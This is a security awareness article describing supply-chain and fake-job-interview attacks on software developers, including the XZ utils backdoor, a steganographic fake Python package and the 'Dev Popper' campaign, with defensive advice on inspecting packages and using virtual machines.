Hackers Targeting Developers Hard

 

One thing is trying to pretend to be a developer for nefarious purposes; another is to target them directly.

Many instances have occurred where fake volunteer developers have asked to join open-source projects with the intention of injecting malicious code into well-known libraries, a known threat. We have known about this threat for over a decade, and it has been successful. I want to remind you of one of the latest episodes, the one affecting the XZ utils library. The malicious code lurked around for some time until it was spotted.

Read more about the compromised XZ utils code if you haven't already.

However, in recently identified events, it appears that cyber attacks have evolved to target developers and their systems directly.

The first instance of this trend was the distribution of a fake copy of the Python 'request' library. Since this library was discontinued but remained well-known, and online tutorials had used it in the past, hackers saw an opportunity to spread a false, malware-embedded copy of the library.

The malicious library was also distributed through the PyPi - Python Package Index online website, the most common place used by developers to search for libraries to use in their projects.

The evil library package included a trampoline to Go lang code, which was used to decode the second stage, including the real malicious code. The real malicious code was hidden inside a picture that came with the code; specifically, a sidebar PNG logo. This technique is called Steganography - where real-looking images include hidden code that is often encoded or encrypted. A technique used since ancient Rome, it has been adopted in the digital world to evade inspection and hide secrets.

The discovery of the fake 'request' package was close to the finding of a rogue npm package named 'vue2util', designed to pose as a helper utility but intended to carry out a cryptojacking scheme and steal a victim's USDT tokens.

Recent discoveries have identified fake job campaigns targeting developers.

According to Securonix analysts, a new campaign tracked as 'Dev Popper' is targeting software developers with fake job interviews in an attempt to trick them into installing a Trojan on their laptops.

Developers are requested to perform a standard coding task from GitHub by downloading a file and running code. The file in question is a ZIP archive containing an NPM package. Once the developer runs the NPM package, several actions will be undertaken, unknown to the victim:

• An obfuscated JavaScript file, "imageDetails.js," is executed.
• Several 'curl' commands download new malicious code onto the victim's computer.
• The downloaded files contain the Trojan code, which will persist on the machine.
• The Trojan will collect and send information to the attacker's server.
• The Trojan will allow for command and control over the developer's computer.

Given that developers have access to code repositories belonging to various organizations, as well as network access, hackers are trying to score big. A successful attack will grant hackers with access to modify the code pushed by developers, access a company's internal network and assets (which would be difficult to compromise from the internet), and ultimately gain access to valuable information.

Consider be very skeptic of 'too good to be true' offers. Always inspect any program, library or package before running on your system. When time doesn't allow to be too prudent, always use virtual systems. That is a Virtual Machine to prevent affecting your computer. Also make sure to destroy or revert the virtual machine state so that the malicious code is not kept. 

Be aware and inspect. At times a quick look can already tell something is not right. For instance, the fake python 'request' - Whois writing and distributing the library? Are they legit? How popular this is? Why a Go lang code in a Python package?